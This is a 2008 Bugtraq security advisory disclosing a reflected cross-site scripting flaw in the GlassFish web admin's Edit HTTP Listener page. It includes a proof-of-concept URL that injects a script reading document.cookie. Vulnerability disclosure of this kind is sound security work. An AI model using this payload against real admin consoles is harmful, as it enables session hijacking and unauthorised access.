XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

From: Eduardo Jorge <serrano.neves_at_nospam>
Date: Tue Jun 10 2008 - 18:12:08 GMT
To: bugtraq@securityfocus.com

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com

APPLICATION : Glassfish webadmin interface VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs) VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

Descrition:

This vulnerability was found in Edit HTTP Listener section in Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config -- |_|0|_| Serrano Neves - a.k.a eth0 |_|_|0| http://webappsecurity.wordpress.com |0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds

This message: [ Message body ]
Next message: zdi-disclosures_at_nospam: "ZDI-08-037: Apple QuickTime Indeo Video Buffer Overflow Vulnerability"
Previous message: iDefense Labs: "iDefense Security Advisory 06.10.08: Multiple Vendor FreeType2 Multiple Heap Overflow Vulnerabilities"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]